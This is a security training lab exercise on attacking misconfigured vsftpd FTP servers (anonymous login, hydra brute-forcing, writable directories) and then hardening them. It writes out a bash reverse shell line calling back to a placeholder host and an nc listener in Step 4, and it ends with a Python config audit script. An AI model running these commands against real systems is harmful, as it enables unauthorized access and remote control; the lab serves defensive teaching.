Exercise 29: Exploiting Insecure FTP Configurations

May 27, 2025

Objective: Exploit FTP server misconfigurations, such as anonymous access or weak authentication, to gain unauthorized access to files, and learn how to secure FTP servers against such vulnerabilities.


Scenario: FTP (File Transfer Protocol) is commonly used for transferring files across a network. Misconfigured FTP servers, such as those allowing anonymous access or weak credentials, can expose sensitive data to unauthorized users. Your task is to identify and exploit these vulnerabilities and secure the FTP server.


Lab Setup

  1. Environment:
    • A Linux system running an FTP server (e.g., vsftpd) with intentional misconfigurations.
    • Anonymous or weak credentials enabled for testing.
  2. Tools Required:
    • ftp client or smbclient for interaction.
    • nmap for network scanning.

Lab Steps

Step 1: Identify Open FTP Servers

  1. Use nmap to scan for open FTP ports on the network:
       nmap -p 21 --script=ftp-anon,ftp-brute <target_ip>
    • Replace <target_ip> with the IP address of the target system.
    • Example output:
       21/tcp open ftp
       | ftp-anon: Anonymous FTP login allowed
  2. Verify that the FTP service is running and accessible:
       ftp <target_ip>

Step 2: Test for Anonymous Login

  1. Attempt to log in as an anonymous user:
       ftp <target_ip>
       Name: anonymous
       Password: <any_email>
  2. List files and directories on the server:
       ls
  3. Download files for further analysis:
       get <filename>

Step 3: Perform a Brute-Force Attack

  1. Use a brute-force tool like hydra to test for weak credentials:
       hydra -l admin -P passwords.txt ftp://<target_ip>
    • Replace passwords.txt with a wordlist of weak passwords.
  2. Log in using discovered credentials:
       ftp <target_ip>

Step 4: Exploit Writable Directories

  1. Identify writable directories by attempting to create one from the FTP session:
       mkdir test
  2. Upload a malicious file to the writable directory:
       put malicious.txt
  3. If the server allows script execution, create a reverse shell script on your machine and upload it from the FTP session:
       echo 'bash -i >& /dev/tcp/<your_ip>/4444 0>&1' > reverse_shell.sh
       put reverse_shell.sh
  4. Set up a listener on your machine:
       nc -lvnp 4444
  5. Trigger the malicious file to gain access.

Solution

Explanation:

  • FTP servers with misconfigurations, such as allowing anonymous access or weak credentials, expose sensitive data.
  • Writable directories can be exploited to upload malicious files.

Prevention:

  1. Disable Anonymous Access:
    • Edit the FTP configuration file (e.g., /etc/vsftpd.conf) and set:
       anonymous_enable=NO
  2. Enforce Strong Passwords:
    • Use tools like pam_pwquality to enforce strong password policies.
    • Configure /etc/security/pwquality.conf with rules for minimum password length and complexity.
  3. Restrict Writable Directories:
    • Limit write permissions to trusted users only.
    • Example configuration for /etc/vsftpd.conf:
       write_enable=YES
       local_enable=YES
  4. Enable Encryption:
    • Use FTPS (FTP Secure) to encrypt data in transit.
  5. Monitor and Audit Access:
    • Log all FTP activities and review the log for auditing:
       sudo cat /var/log/vsftpd.log

Testing and Verification

  1. Attempt to log in as an anonymous user after disabling anonymous access to confirm it is restricted.
  2. Verify that writable directories are restricted to authorized users only.
  3. Test encryption by ensuring FTP connections use TLS.
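
A static check to run before the live tests above, as an added example that is not part of the original exercise: it parses vsftpd.conf text and flags the settings from the Prevention list. The sample configs are constructed and the finding names are this example's own labels; the defaults are vsftpd's built-in values, so an option missing from the file can still be insecure.

```python
# Added example: static audit of vsftpd.conf text against the Prevention list.
TRUE_VALUES = {"YES", "TRUE", "1"}  # boolean spellings vsftpd accepts

# Built-in defaults from vsftpd.conf(5); an option missing from the file keeps these.
DEFAULTS = {
    "anonymous_enable": True, "anon_upload_enable": False,
    "anon_mkdir_write_enable": False, "write_enable": False,
    "ssl_enable": False, "force_local_logins_ssl": True,
    "force_local_data_ssl": True, "xferlog_enable": False,
}

def parse_conf(text):
    """Return the effective value of each audited option (last assignment wins)."""
    settings = dict(DEFAULTS)
    for line in text.splitlines():
        line = line.strip()
        if not line or line.startswith("#") or "=" not in line:
            continue
        key, value = line.split("=", 1)  # vsftpd allows no spaces around '='
        if key in settings:
            settings[key] = value.upper() in TRUE_VALUES
    return settings

def audit(text):
    """Return a list of (finding_id, explanation) tuples for weak settings."""
    s = parse_conf(text)
    findings = []
    if s["anonymous_enable"]:
        findings.append(("anonymous_login", "anonymous_enable is YES (also the default)"))
        if s["write_enable"] and (s["anon_upload_enable"] or s["anon_mkdir_write_enable"]):
            findings.append(("anonymous_write", "anonymous users can upload or mkdir"))
    if not s["ssl_enable"]:
        findings.append(("cleartext", "ssl_enable is NO: logins and data are unencrypted"))
    elif not (s["force_local_logins_ssl"] and s["force_local_data_ssl"]):
        findings.append(("tls_optional", "local users may still connect without TLS"))
    if not s["xferlog_enable"]:
        findings.append(("no_transfer_log", "xferlog_enable is NO: transfers are not logged"))
    return findings

# Constructed sample configs (not taken from a real server).
LAB_CONF = "anonymous_enable=YES\nwrite_enable=YES\nanon_upload_enable=YES\nlocal_enable=YES\n"
HARDENED_CONF = ("# hardened\nanonymous_enable=NO\nlocal_enable=YES\nwrite_enable=YES\n"
                 "ssl_enable=YES\nxferlog_enable=YES\n")

if __name__ == "__main__":
    for name, conf in (("lab", LAB_CONF), ("hardened", HARDENED_CONF)):
        print(name, [fid for fid, _ in audit(conf)] or "no findings")
```

An empty or minimal config still reports anonymous_login, which is why anonymous_enable=NO has to be set explicitly rather than assumed.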

Reflection

This exercise demonstrates the risks posed by insecure FTP configurations and how attackers can exploit them. By identifying vulnerabilities and applying mitigations, you’ve gained practical experience in securing FTP services.
